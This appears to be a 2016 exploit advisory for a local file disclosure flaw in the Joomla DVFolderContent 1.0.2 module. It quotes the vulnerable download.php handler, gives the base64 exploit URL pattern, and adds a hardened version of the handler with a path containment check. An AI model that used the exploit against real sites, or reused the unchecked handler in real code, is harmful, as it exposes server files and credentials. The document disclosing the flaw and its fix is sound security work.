Joomla DVFolderContent module version 1.0.2 suffers from a local file disclosure vulnerability.
######################
# Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent
# Category [ Webapps ]
# Tested on [ Win ]
# Version : V1.0.2
# Date 2016/10/01
######################
PoC
The vulnerable page is
/modules/mod_dvfoldercontent/download.php

    // The path comes straight from the request; it is only base64-decoded
    $file = base64_decode($_GET['f']);
    // is_file() is the only check made before the file is sent
    if (is_file($file)) {
        $fileinfo = pathinfo($file);
        $filename = $fileinfo['basename'];
        $filesize = filesize($file);
        header("Content-Type: application/octet-stream; name=$filename");
        header("Content-Disposition: attachment; filename=$filename");
        header("Content-Length: $filesize");
        header("Pragma: no-cache");
        readfile($file);
    }

Exploit:
http://server/modules/mod_dvfoldercontent/download.php?f=base64
Video : http://persian-team.ir/showthread.php?tid=165&pid=298
######################
# Discovered by : Mojtaba MobhaM
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
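
A hardened form of the handler quoted in the PoC, as an added example that is not the vendor's code or part of the original advisory: it treats the decoded f value as relative to one download folder and refuses anything whose canonical path falls outside it. DV_BASE_DIR and dv_resolve_download() are hypothetical names, and the folder path is an assumption.

```php
<?php
// Added example, not the vendor's code.
// ASSUMPTION: DV_BASE_DIR is a hypothetical constant naming the only folder
// the module is meant to serve; the module's real configuration is not shown.
const DV_BASE_DIR = '/var/www/joomla/images/downloads';

/**
 * Resolve a base64-encoded request parameter to a file inside $baseDir.
 * Returns the canonical path, or null if the request must be refused.
 */
function dv_resolve_download(string $encoded, string $baseDir): ?string
{
    $base = realpath($baseDir);
    $decoded = base64_decode($encoded, true); // strict: reject non-alphabet input
    if ($base === false || $decoded === false || $decoded === ''
        || strpos($decoded, "\0") !== false) {
        return null;
    }
    // Treat the value as relative to the base folder, then canonicalise so
    // ../ sequences and symlinks are resolved before the containment check.
    $real = realpath($base . DIRECTORY_SEPARATOR . $decoded);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment: the canonical path must sit under the base folder.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Accept only a scalar string parameter (f[]=... would arrive as an array).
$param = $_GET['f'] ?? '';
$path = is_string($param) ? dv_resolve_download($param, DV_BASE_DIR) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}
// Keep header-breaking characters out of the quoted filename.
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

The containment check runs on the output of realpath(), so it compares the path the filesystem will actually open rather than the string the client supplied.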